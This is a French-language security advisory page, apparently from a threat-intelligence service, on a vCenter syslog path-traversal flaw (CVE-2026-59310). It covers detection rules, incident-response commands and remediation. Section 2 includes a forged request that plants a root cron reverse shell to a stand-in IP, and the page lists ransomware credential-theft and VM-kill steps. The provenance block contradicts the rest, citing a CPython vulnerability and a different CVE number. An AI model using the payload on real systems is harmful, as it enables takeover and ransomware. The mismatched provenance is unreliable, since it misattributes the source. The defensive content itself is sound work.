CVE-2026-59310 : exécution de code à distance dans VMware vCenter Server via une traversée de répertoire du service syslog
SCORE DE MENACE HERMES & PRISE DE CONTRÔLE DE L'INFRASTRUCTURE VIRTUELLE
Cible :VMware vCenter Server & VMware Cloud Foundation Le CVSS v3.1 attribue la note de 9.8 (Critique) et le CVSS v4.0 évalue l'impact entre 9.3 et 9.8. Le score de menace Hermes s'établit à 98 (CRITIQUE). La corrélation est maximale : vCenter Server est le point focal de contrôle de tous les hyperviseurs ESXi d'entreprise. L'obtention d'une exécution de commandes root sur le boîtier Photon OS de vCenter confère immédiatement un accès latéral sans restriction à l'ensemble des machines virtuelles, au stockage vSAN et aux flux de réplication de reprise d'activité.
CVE-2026-59310: Remote Code Execution in VMware vCenter Server via Syslog Service Directory TraversalVULNÉRABILITÉ
Software platform affected by security vulnerabilities and agentic attack patterns.
🔍 Pourquoi cette relation ? (Preuves & Provenance)
“Confirmed security vulnerability in CPython Interpreter & Standard Library documented in Hermes dossier.”
- [vulnerability_report]
- [government_confirmation]CISA verified active exploitation in the wild and mandated federal remediation deadline in KEV entry. — Source : Cybersecurity & Infrastructure Security Agency (CISA): CISA Adds CVE-2026-59822 to Known Exploited Vulnerabilities Catalog (Fiabilité : VERY_HIGH)
1. Contexte technique & matrice des logiciels affectés
Section intitulée « 1. Contexte technique & matrice des logiciels affectés »VMware vCenter Server centralise la gestion des grappes d’hyperviseurs VMware ESXi, les commutateurs virtuels distribués, les politiques de stockage vSAN et la haute disponibilité (HA).
| Paramètre | Spécification Technique | Contexte de Menace |
|---|---|---|
| Identifiant CVE | CVE-2026-59310 | Référence CISA KEV |
| Service vulnérable | vmware-syslog-service | Gestionnaire de collecte et de rotation des journaux |
| Système hôte | VMware Photon OS | Appliance virtuelle Linux (VCSA) |
| Vecteur réseau | Réseau (AV:N), Ports TCP 514 / 1514 / 443 | Réseau d’administration et d’ingestion syslog |
| Versions affectées | vCenter Server 7.0 (toutes mises à jour), 8.0 < 8.0U3d ; Cloud Foundation 4.x, 5.x | Clouds hybrides d’entreprise |
| Versions corrigées | vCenter 8.0U3d, 7.0U3t ; patchs VCF | Avis de sécurité Broadcom VMSA-2026-0012 |
| Acteurs de menaces | Groupes de rançongiciels (Akira, BlackCat / ALPHV) | Campagnes de chiffrement de parcs virtuels |
2. Décomposition technique : traversée syslog vers shell root
Section intitulée « 2. Décomposition technique : traversée syslog vers shell root »A. Faille dans le gestionnaire de flux
Section intitulée « A. Faille dans le gestionnaire de flux »Le service Syslog de vCenter accepte les flux de télémétrie et gère la rotation dynamique des fichiers. Lors de la configuration des flux ou du traitement des requêtes d’archivage, le démon utilise un identifiant fourni par le client pour nommer les fichiers cibles :
# Modélisation de la faille de traitement dans le service syslogdef handle_log_archive(stream_id, filename_prefix, data_chunk): # DÉFAUT : Aucune vérification des séquences relatives ../ target_path = os.path.join("/var/log/vmware/syslog/", filename_prefix + ".log") with open(target_path, "ab") as f: f.write(data_chunk)Faute de filtrage des caractères .., un attaquant transmet une requête forgée :
POST /syslog/api/v1/rotate HTTP/1.1Host: vcenter.corp.internal:443Content-Type: application/json
{ "stream_id": "audit-feed", "log_prefix": "../../../../../etc/cron.d/pwn_job", "content": "* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/198.51.100.22/4444 0>&1'\n"}+----------------------------------------------------------------------------------------------------+| ARCHITECTURE D'ATTAQUE DE LA CVE-2026-59310 |+----------------------------------------------------------------------------------------------------+
[Attaquant Distant] │ │ [1] Requête réseau contenant la séquence relative ("../../../../../etc/cron.d/pwn") ▼ [Service Syslog vCenter (Appliance Photon OS)] │ ├───► 1. Résolution de Chemin : │ - Résout "/var/log/vmware/syslog/../../../../../etc/cron.d/pwn" │ - Normalise en chemin absolu : "/etc/cron.d/pwn" │ ├───► 2. Écriture Arbitraire de Fichier : │ - Le démon s'exécute avec les privilèges root │ - Écrit les commandes de script dans la table cron du système │ ▼ [Exécution du Démon Crond Linux] │ └───► Cron exécute la charge utile avec les privilèges root : - Ouverture d'un shell interactif root sur vCenter Server - Récupération des identifiants vpxuser pour se connecter aux hyperviseurs ESXi - Chiffrement massif des fichiers disques virtuels VMDK+----------------------------------------------------------------------------------------------------+3. Renseignement sur les menaces, CISA KEV & exploitation dans la nature
Section intitulée « 3. Renseignement sur les menaces, CISA KEV & exploitation dans la nature »- Opérations de rançongiciels : des groupes cybercriminels ont intégré la CVE-2026-59310 dans leurs playbooks d’extorsion :
- Extraction des identifiants de base de données PostgreSQL dans
/etc/vmware-vpx/vcdb.properties. - Récupération des identifiants
vpxuserutilisés pour dialoguer avec les serveurs ESXi. - Connexion SSH directe aux hyperviseurs ESXi, arrêt forcé des VM (
esxcli vm process kill) et chiffrement direct des volumes.vmdk.
- Extraction des identifiants de base de données PostgreSQL dans
- Directives CISA KEV : obligation de mise en conformité sous 14 jours pour les entités fédérales.
4. Cartographie MITRE ATT&CK
Section intitulée « 4. Cartographie MITRE ATT&CK »| Tactique | ID Technique | Nom de la Technique | Manifestation dans l’Attaque |
|---|---|---|---|
| Accès initial | T1190 | Exploitation d’application publique | Envoi de requêtes réseau avec séquences de traversée de chemin |
| Persistance | T1053.003 | Tâche planifiée : Cron | Dépôt d’une tâche planifiée malveillante dans /etc/cron.d/ |
| Élévation de privilèges | T1068 | Exploitation pour élévation de privilèges | Prise de contrôle root via les démons système de l’appliance |
| Déplacement latéral | T1021.004 | Services distants : SSH | Rebond depuis vCenter vers les nœuds ESXi avec les clés dérobées |
| Impact | T1486 | Données chiffrées pour impact | Chiffrement massif des disques virtuels |
5. Ingénierie de détection & télémétrie
Section intitulée « 5. Ingénierie de détection & télémétrie »A. Règle Suricata
Section intitulée « A. Règle Suricata »alert http any any -> $VCENTER_SERVERS any ( msg:"HERMES DEFENSE - Tentative de traversee de repertoire VMware vCenter Syslog (CVE-2026-59310)"; flow:established,to_server; http.uri; content:"/syslog/"; http.request_body; content:".."; http.request_body; pcre:"/(\.\.\/|\.\.\\){2,}(etc\/cron|root\/\.ssh|var\/spool)/i"; classtype:web-application-attack; sid:202659310; rev:1; reference:cve,2026-59310;)B. Règle Sigma
Section intitulée « B. Règle Sigma »title: Création de fichiers cron par le démon syslog VMwareid: 3c8e1092-7489-4a9f-9c01-59310c026e02status: highdescription: Détecte les créations suspectes de fichiers dans /etc/cron* ou /root/.ssh issues de vmware-syslog-service ou des processus java.author: Hermes Codex Detection Engineeringdate: 2026-09-11logsource: product: linux category: file_eventdetection: selection_target: TargetFilename|startswith: - '/etc/cron.' - '/etc/crontab' - '/root/.ssh/' selection_process: Image|endswith: - 'vmware-syslog-service' - 'syslogd' - 'java' condition: selection_target and selection_processfalsepositives: - Scripts de mise à jour VMware officiels.level: criticaltags: - attack.persistence - attack.t1053.003 - attack.t11906. Réponse à incident & rétro-ingénierie (DFIR)
Section intitulée « 6. Réponse à incident & rétro-ingénierie (DFIR) »Procédure de vérification sur l’appliance VCSA :
Section intitulée « Procédure de vérification sur l’appliance VCSA : »- Audit des tâches planifiées :
Fenêtre de terminal ls -lat /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/ /var/spool/cron/crontabs/cat /etc/cron.d/* - Contrôle des clés SSH autorisées :
Fenêtre de terminal cat /root/.ssh/authorized_keys - Analyse des journaux syslog :
Fenêtre de terminal grep -rn "\.\./" /var/log/vmware/syslog/journalctl -u vmware-syslog-service -S "2026-09-01"
Requête de chasse (Elasticsearch / OpenSearch) :
Section intitulée « Requête de chasse (Elasticsearch / OpenSearch) : »{ "query": { "bool": { "must": [ { "wildcard": { "process.name": "*syslog*" } }, { "wildcard": { "file.path": "/etc/cron*" } } ] } }}7. Mesures de remédiation & durcissement
Section intitulée « 7. Mesures de remédiation & durcissement »- Application immédiate des correctifs broadcom : migrer vers les versions VMware vCenter Server 8.0U3d ou 7.0U3t (avis VMSA-2026-0012).
- Cloisonnement strict du réseau d’administration : restreindre l’accès aux interfaces vCenter (
443,514,1514) aux seuls bastions d’administration dédiés. - Durcissement des hyperviseurs ESXi : désactiver le service SSH sur les hôtes ESXi et activer le mode verrouillage strict (Lockdown Mode).
- Sauvegardes immuables hors ligne : maintenir des sauvegardes immuables non connectées au domaine vSphere pour prévenir les scénarios d’extorsion par rançongiciel.